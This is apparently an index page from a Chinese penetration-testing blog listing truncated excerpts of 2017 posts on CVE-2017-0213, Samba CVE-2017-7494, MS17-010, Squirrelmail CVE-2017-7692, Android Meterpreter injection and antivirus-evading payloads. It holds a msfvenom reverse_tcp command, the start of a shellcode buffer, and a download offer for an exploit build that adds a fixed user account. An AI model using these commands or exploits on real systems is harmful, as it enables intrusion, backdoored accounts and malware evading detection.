CVE-2017-0213添加用户

时间:2017-6-16   作者:webbaozi   分类: 安全工具   热度:120°    
时间:2017-6-16   分类: 安全工具    热度:120  
代码摘取:https://github.com/WindowsExploits/Exploits/blob/master/CVE-2017-0213/Source/CVE-2017-0213.cpp 源代码新建一个cmd窗口,改了下直接添加用户。 使用说明: 直接运行exe成功会添加用户 用户名:webbaozi 密码:webbaozi!@#123 win7测试x64(其他系统以及x86请自测): 下载地址: 链接: https://pan.baidu.com/s/1o8iD...

阅读全文>>

kwetza - 向 Android 应用中注入 Meterpreter payload 的 Python 脚本

时间:2017-6-13   作者:webbaozi   分类: 实用工具   热度:104°    
时间:2017-6-13   分类: 实用工具    热度:104  
Getting the code Firstly get the code: git clone https://github.com/sensepost/kwetza.git Kwetza is written in Python and requires BeautifulSoup which can be installed using Pip: pip install beautifulsoup4 Kwetza requires Apktool to be install and accessible via your PATH. This ...

阅读全文>>

Samba远程代码执行漏洞利用

时间:2017-5-30   作者:webbaozi   分类: 渗透测试   热度:176°    
时间:2017-5-30   分类: 渗透测试    热度:176  
概述 linux或unix下所使用Samba服务允许恶意的用户上传类库到可读可写的共享目录进而导致服务器远程代码执行。 漏洞编号: CVE-2017-7494 漏洞等级: 严重 漏洞影响: Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间版本 默认端口: 445 漏洞复现 1.靶机环境搭建: 靶机环境系统使用kali: IP地址:192.168.10.62 [email protected]:/# uname -a Linux yunxu 4.9.0-kali3-amd64 ...

阅读全文>>

Metasploit生成免杀payload笔记

时间:2017-5-22   作者:webbaozi   分类: 渗透测试   热度:153°    
时间:2017-5-22   分类: 渗透测试    热度:153  
msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.2.222 -i 11 -f py -o msf.py 然后更改z.py样式如下: from ctypes import * import ctypes buf = "" buf += "\xda\xca\xb8\x17\x5d\x14\x92\xd9\x74\x24\xf4\x5d\x29" buf += "\xc9\xb1\x97\x31\x45\x1a\x03\x45\x1a\x83\x...

阅读全文>>

MS17-010漏洞检测与内网穿透技术的应用

时间:2017-5-15   作者:webbaozi   分类: 渗透测试   热度:284°    
时间:2017-5-15   分类: 渗透测试    热度:284  
0x00 前言 本文主要介绍一下MSF模块的下载、使用,以及当攻击机处于内网,而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下,并没有新的知识点,可以为刚入门的新手抛砖引玉,提供一条解决问题的思路,同时也记录一下过程,加强记忆。 主要分为两个知识点,一是SMB漏洞的批量检测,二是内网穿透技术。 首先是环境的搭建,具体如下表所示: 主机 IP 备注 ...

阅读全文>>

Squirrelmail远程代码执行漏洞(CVE-2017-7692)复现+修复方案

时间:2017-5-14   作者:webbaozi   分类: 渗透测试   热度:177°    
时间:2017-5-14   分类: 渗透测试    热度:177  
一:实验环境 操作机:kali2.0 目标机:Centos 6.0 Squirrelmail版本:1.4.22-4el6 二、漏洞原理 1、有一个可以登录的邮箱账号和密码 2、Squirrelmai的MAT(因特网邮件传送代理)需要配置Sendmail 3、Squirrelmail的edit_identity配置为true(默认配置) 该漏洞的触发点位于Squirrelmail源码中的Deliver_SendMail.class.php文件中,在initStream函数中,使用了escapeshellcmd()来过滤用户的信息,然后将处理后的字...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1    
00:00 / 00:00
随机播放